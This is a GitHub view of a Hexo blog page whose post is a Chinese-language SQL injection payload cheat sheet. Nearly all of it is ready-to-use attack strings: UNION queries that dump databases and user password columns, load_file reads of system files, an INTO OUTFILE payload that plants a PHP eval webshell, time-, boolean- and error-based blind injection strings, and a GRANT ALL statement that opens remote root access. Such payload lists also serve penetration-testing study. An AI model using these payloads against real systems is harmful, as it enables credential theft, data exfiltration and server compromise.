-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
718 lines (450 loc) · 190 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta property="og:type" content="website">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary"><title>Hexo</title><link ref="canonical" href="http://example.com/index.html"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/[email protected]/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
root: '/',
algolia: undefined,
assistSearch: undefined,
fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
sidebar: {"offsetTop":"20px","tocMaxDepth":6},
header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
postWidget: {"endText":true},
nightMode: {"enable":true},
back2top: {"enable":true},
codeblock: {"style":"default","highlight":"light","wordWrap":false},
reward: false,
fancybox: false,
zoomImage: {"gapAside":"20px"},
galleryWaterfall: undefined,
lazyload: false,
pjax: undefined,
externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
shortcuts: undefined,
prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
sourcePath: {"js":"js","css":"css","images":"images"},
};
window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Hexo</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content content-home" id="content"><section class="postlist"><article class="postlist-item post"><header class="post-header"><h1 class="post-title"><a class="post-title__link" href="/2021/12/01/-0-SQL%E6%B3%A8%E5%85%A5payload/">SQL注入payload</a></h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-12-01</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-12-01</span></span></div></header><div class="post-body"><div class="post-excerpt">
<h1 id="SQL注入" >
<a href="#SQL注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1>
<p>SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。</p>
<p>攻击总体思路:</p>
<p>1:寻找到SQL注入的位置</p>
<p>2:判断服务器类型和后台数据库类型</p>
<p>3:针对不同的服务器和数据库特点进行SQL注入攻击</p>
<h2 id="0x00-SQL基本语法" >
<a href="#0x00-SQL基本语法" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x00-SQL基本语法" class="headerlink" title="0x00 SQL基本语法"></a>0x00 SQL基本语法</h2>
<p>MySQL开启远程连接 <strong>GRANT ALL</strong> <strong>PRIVILEGES ON *.* TO ‘用户名‘@’%’ IDENTIFIED BY ‘密码’ WITH GRANT OPTION;</strong></p>
<h3 id="0-表的用途" >
<a href="#0-表的用途" class="heading-link"><i class="fas fa-link"></i></a><a href="#0-表的用途" class="headerlink" title="0 表的用途"></a>0 表的用途</h3>
<p>MySQL</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">information_schema.schemata 存放所有数据库</span><br><span class="line"> schema_name 数据库名称</span><br><span class="line"></span><br><span class="line">information_schema.tables 存放所有数据库的表</span><br><span class="line"> table_schema 数据库名称</span><br><span class="line"> table_name 表名称</span><br><span class="line"> </span><br><span class="line">information_schema.columns 存放所有数据库的列</span><br><span class="line"> table_schema 数据库名称</span><br><span class="line"> table_name 表名称</span><br><span class="line"> column_name 列名称</span><br></pre></td></tr></table></div></figure>
<h3 id="1-SELECT" >
<a href="#1-SELECT" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-SELECT" class="headerlink" title="1 SELECT"></a>1 SELECT</h3>
<p>SELECT * FROM 数据库.表</p>
<h3 id="2-INSERT" >
<a href="#2-INSERT" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-INSERT" class="headerlink" title="2 INSERT"></a>2 INSERT</h3>
<p>INSERT INTO table_name (column_list) VALUES (value_list);</p>
<h3 id="3-UPDATE" >
<a href="#3-UPDATE" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-UPDATE" class="headerlink" title="3 UPDATE"></a>3 UPDATE</h3>
<p>UPDATE subDomainDic SET type4domain=NULL,dic_target=0,domain_target=NULL WHERE dic_target=1;</p>
<h3 id="4-DELETE" >
<a href="#4-DELETE" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-DELETE" class="headerlink" title="4 DELETE"></a>4 DELETE</h3>
<p>DELETE FROM table_name WHERE predicate;</p>
<h3 id="5-基本函数" >
<a href="#5-基本函数" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-基本函数" class="headerlink" title="5 基本函数"></a>5 基本函数</h3>
<p>MySQL</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mid</span><br><span class="line">substr</span><br><span class="line">group_concat</span><br><span class="line">Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。</span><br></pre></td></tr></table></div></figure>
<h3 id="6-基本语句" >
<a href="#6-基本语句" class="heading-link"><i class="fas fa-link"></i></a><a href="#6-基本语句" class="headerlink" title="6 基本语句"></a>6 基本语句</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">显示版本:<span class="keyword">select</span> version();</span><br><span class="line">显示字符集:<span class="keyword">select</span> @<span class="variable">@character</span>_set_database;</span><br><span class="line">显示数据库<span class="keyword">show</span> databases;</span><br><span class="line">显示表名:<span class="keyword">show</span> tables;</span><br><span class="line">显示计算机名:<span class="keyword">select</span> @<span class="variable">@hostname</span>;</span><br><span class="line">显示系统版本:<span class="keyword">select</span> @<span class="variable">@version</span>_compile_os;</span><br><span class="line">显示mysql路径:<span class="keyword">select</span> @<span class="variable">@basedir</span>;</span><br><span class="line">显示数据库路径:<span class="keyword">select</span> @<span class="variable">@datadir</span>;</span><br><span class="line">显示root密码:<span class="keyword">select</span> <span class="keyword">User</span>,Password <span class="keyword">from</span> mysql.user;</span><br><span class="line">开启外连:<span class="keyword">GRANT</span> <span class="keyword">ALL</span> PRIVILEGES <span class="keyword">ON</span> <span class="operator">*</span>.<span class="operator">*</span> <span class="keyword">TO</span> <span class="string">'root'</span>@<span class="string">'%'</span> IDENTIFIED <span class="keyword">BY</span> <span class="string">'123456'</span> <span class="keyword">WITH</span> <span class="keyword">GRANT</span> OPTION;</span><br></pre></td></tr></table></div></figure>
<h3 id="x-中间件容器解析的区别" >
<a href="#x-中间件容器解析的区别" class="heading-link"><i class="fas fa-link"></i></a><a href="#x-中间件容器解析的区别" class="headerlink" title="x 中间件容器解析的区别"></a>x 中间件容器解析的区别</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">index.php?id<span class="operator">=</span><span class="number">1</span><span class="operator">&</span>id<span class="operator">=</span><span class="number">2</span></span><br><span class="line">apache(php)解析最后一个参数,即显示id<span class="operator">=</span><span class="number">2</span>的内容。</span><br><span class="line">Tomcat(jsp)解析第一个参数,即显示id<span class="operator">=</span><span class="number">1</span>的内容。</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<div class="table-container"><table>
<thead>
<tr>
<th align="center">Web服务器</th>
<th align="center">参数获取函数</th>
<th align="center">获取到的参数</th>
</tr>
</thead>
<tbody><tr>
<td align="center">PHP/Apache</td>
<td align="center">$_GET(“par”)</td>
<td align="center">Last</td>
</tr>
<tr>
<td align="center">JSP/Tomcat</td>
<td align="center">Request.getParameter(“par”)</td>
<td align="center">First</td>
</tr>
<tr>
<td align="center">Perl(CGI)/Apache</td>
<td align="center">Param(“par”)</td>
<td align="center">First</td>
</tr>
<tr>
<td align="center">Python/Apache</td>
<td align="center">getvalue(“par”)</td>
<td align="center">All(list)</td>
</tr>
<tr>
<td align="center">ASP/IIS</td>
<td align="center">Request.QuertString(“par”)</td>
<td align="center">All(comma-delimited string)</td>
</tr>
</tbody></table></div>
<h3 id="不同数据库的注入判断" >
<a href="#不同数据库的注入判断" class="heading-link"><i class="fas fa-link"></i></a><a href="#不同数据库的注入判断" class="headerlink" title="不同数据库的注入判断"></a>不同数据库的注入判断</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># Oracle</span><br><span class="line"><span class="string">'+UNION+SELECT+'</span>abc<span class="string">','</span>def<span class="string">'+FROM+dual--</span></span><br><span class="line"><span class="string"># 显示数据库版本: </span></span><br><span class="line"><span class="string">'</span><span class="operator">+</span><span class="keyword">UNION</span><span class="operator">+</span><span class="keyword">SELECT</span><span class="operator">+</span>BANNER,<span class="operator">+</span><span class="keyword">NULL</span><span class="operator">+</span><span class="keyword">FROM</span><span class="operator">+</span>v$version<span class="comment">--</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># MSSQL</span><br><span class="line"><span class="string">'+UNION+SELECT+'</span>abc<span class="string">','</span>def<span class="string">'#</span></span><br><span class="line"><span class="string">'</span><span class="keyword">UNION</span><span class="operator">+</span><span class="keyword">SELECT</span><span class="operator">+</span>@<span class="variable">@version</span>,<span class="operator">+</span><span class="keyword">NULL</span><span class="comment">--+a</span></span><br><span class="line"># 检索数据库中的表列表: <span class="string">'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--</span></span><br></pre></td></tr></table></div></figure>
<h2 id="0x01-SQL注入基础" >
<a href="#0x01-SQL注入基础" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x01-SQL注入基础" class="headerlink" title="0x01 SQL注入基础"></a>0x01 SQL注入基础</h2>
<h3 id="1-常规注入" >
<a href="#1-常规注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-常规注入" class="headerlink" title="1 常规注入"></a>1 常规注入</h3>
<p>爆数据库</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata<span class="comment">--</span></span><br></pre></td></tr></table></div></figure>
<p>爆数据表</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='</span>security<span class="string">'--+</span></span><br></pre></td></tr></table></div></figure>
<p>爆数据列</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='</span>security<span class="string">' and table_name='</span>users<span class="string">'--+</span></span><br></pre></td></tr></table></div></figure>
<p>爆数据</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">') and 1=2 union select 1,group_concat(username),group_concat(password) from security.users--+</span></span><br></pre></td></tr></table></div></figure>
<p>查看是否具有读取权限</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 如果结果返回正常,说明具有读写权限。</span><br><span class="line"><span class="keyword">select</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">from</span> mysql.user)<span class="operator">></span><span class="number">0</span>;</span><br></pre></td></tr></table></div></figure>
<p>读文件</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,hex(replace(load_file(<span class="type">char</span>(<span class="number">99</span>,<span class="number">58</span>,<span class="number">92</span>,<span class="number">119</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">111</span>,<span class="number">119</span>,<span class="number">115</span>,<span class="number">92</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">114</span>,<span class="number">92</span>,<span class="number">115</span>,<span class="number">97</span>,<span class="number">109</span>)))</span><br><span class="line"></span><br><span class="line">利用hex()将文件内容导出来,尤其是smb文件时可以使用。</span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,load_file(<span class="type">char</span>(<span class="number">99</span>,<span class="number">58</span>,<span class="number">47</span>,<span class="number">98</span>,<span class="number">111</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">105</span>))</span><br><span class="line">Explain:“<span class="type">char</span>(<span class="number">99</span>,<span class="number">58</span>,<span class="number">47</span>,<span class="number">98</span>,<span class="number">111</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">105</span>)”就是“c:<span class="operator">/</span>boot.ini”的ASCII代码</span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,load_file(<span class="number">0x633a2f626f6f742e696e69</span>)</span><br><span class="line">Explain:“c:<span class="operator">/</span>boot.ini”的<span class="number">16</span>进制是“<span class="number">0x633a2f626f6f742e696e69</span>”</span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,load_file(c:\\boot.ini)</span><br><span class="line">Explain:路径里的<span class="operator">/</span>用\\代替</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>文件导入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">')) UNION SELECT 1,2,'</span><span class="operator"><</span>?php<span class="variable">@eval</span>($_post[“mima”])?<span class="operator">></span><span class="string">' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="3-基于时间的盲注" >
<a href="#3-基于时间的盲注" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-基于时间的盲注" class="headerlink" title="3 基于时间的盲注"></a>3 基于时间的盲注</h3>
<p>if判断</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># if表达式 如果a表达式为真,则执行b表达式,为假则执行c表达式</span><br><span class="line">if(a, b, c)</span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span><span class="string">' or if(1,sleep(2),1)--+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">and (SELECT 7621 FROM (SELECT(SLEEP(5)))fjCb)--+</span></span><br><span class="line"><span class="string">and (SELECT * FROM (SELECT(if(1,sleep(5),1)))aaa)#</span></span><br><span class="line"><span class="string">AND (SELECT 7684 FROM (SELECT(SLEEP(5)))mRcs)</span></span><br></pre></td></tr></table></div></figure>
<p>利用sleep函数进行注入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 若为假则延时五秒</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+</span></span><br></pre></td></tr></table></div></figure>
<p>利用BENCHMARK()进行延时注入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 当结果正确的时候,运行ENCODE(<span class="string">'MSG'</span>,<span class="string">'by5seconds'</span>)操作<span class="number">50000000</span>次,会占用一段时间。</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">'UNION SELECT(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('</span>MSG<span class="string">','</span><span class="keyword">by</span> <span class="number">5</span> seconds<span class="string">')),null)),2,3 FROM(select database() as current)as tb1--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="4-基于布尔的盲注" >
<a href="#4-基于布尔的盲注" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-基于布尔的盲注" class="headerlink" title="4 基于布尔的盲注"></a>4 基于布尔的盲注</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"># rand()布尔判断</span><br><span class="line">rand(<span class="literal">true</span>), rand(<span class="literal">false</span>)</span><br><span class="line">?sort<span class="operator">=</span>rand(ascii(<span class="keyword">left</span>(database(),<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span>)</span><br><span class="line"></span><br><span class="line">###</span><br><span class="line"><span class="keyword">select</span> rand(ascii(<span class="keyword">left</span>(database(),<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span>);</span><br><span class="line"><span class="operator">+</span><span class="comment">-------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> rand(ascii(<span class="keyword">left</span>(database(),<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span>) <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">-------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">0.40540353712197724</span> <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">-------------------------------------+</span></span><br><span class="line"><span class="keyword">select</span> rand(<span class="literal">true</span>);</span><br><span class="line"><span class="operator">+</span><span class="comment">---------------------+</span></span><br><span class="line"><span class="operator">|</span> rand(<span class="literal">true</span>) <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">---------------------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">0.40540353712197724</span> <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">---------------------+</span></span><br><span class="line"></span><br><span class="line"># buer</span><br><span class="line">id<span class="operator">=</span>(<span class="keyword">SELECT</span> (<span class="keyword">CASE</span> <span class="keyword">WHEN</span> (<span class="number">9647</span><span class="operator">=</span><span class="number">9647</span>) <span class="keyword">THEN</span> <span class="number">14</span> <span class="keyword">ELSE</span> (<span class="keyword">SELECT</span> <span class="number">6297</span> <span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="number">2981</span>) <span class="keyword">END</span>))</span><br></pre></td></tr></table></div></figure>
<p>判断数据库版本第一位</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and left(version(),1)=5--+</span></span><br></pre></td></tr></table></div></figure>
<p>判断数据库长度</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and length(database())=8--+</span></span><br></pre></td></tr></table></div></figure>
<p>判断数据库第一位</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and left(database(),1)>'</span>a<span class="string">';--+</span></span><br></pre></td></tr></table></div></figure>
<p>判断数据库第一位ascii</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and ascii(left(database(),1))>100--+</span></span><br></pre></td></tr></table></div></figure>
<p>布尔盲注获取数据表信息</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">substr((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database() limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)</span><br><span class="line"># limit <span class="number">0</span>,<span class="number">1</span>限制显示第一个表 substr限制数据结果的位数显示</span><br><span class="line"># 可组合其他函数使用,如ascii</span><br></pre></td></tr></table></div></figure>
<h3 id="5-报错注入" >
<a href="#5-报错注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-报错注入" class="headerlink" title="5 报错注入"></a>5 报错注入</h3>
<p>xpath函数报错</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># extractvalue</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+</span></span><br><span class="line"><span class="string"># updatexml</span></span><br><span class="line"><span class="string">?id=1'</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> @<span class="variable">@version</span>),<span class="number">0x7e</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></div></figure>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">AND</span> GTID_SUBSET(CONCAT(<span class="number">0x717a6a7071</span>,(<span class="keyword">SELECT</span> (ELT(<span class="number">2101</span><span class="operator">=</span><span class="number">2101</span>,<span class="number">1</span>))),<span class="number">0x71716a6b71</span>),<span class="number">2101</span>)<span class="comment">--</span></span><br><span class="line"></span><br><span class="line">(<span class="keyword">SELECT</span> <span class="number">0x526e5452</span> <span class="keyword">WHERE</span> <span class="number">8019</span><span class="operator">=</span><span class="number">8019</span> <span class="keyword">AND</span> GTID_SUBSET(CONCAT(<span class="number">0x7171787671</span>,(<span class="keyword">SELECT</span> (ELT(<span class="number">5727</span><span class="operator">=</span><span class="number">5727</span>,<span class="number">1</span>))),<span class="number">0x716b7a7171</span>),<span class="number">5727</span>))</span><br></pre></td></tr></table></div></figure>
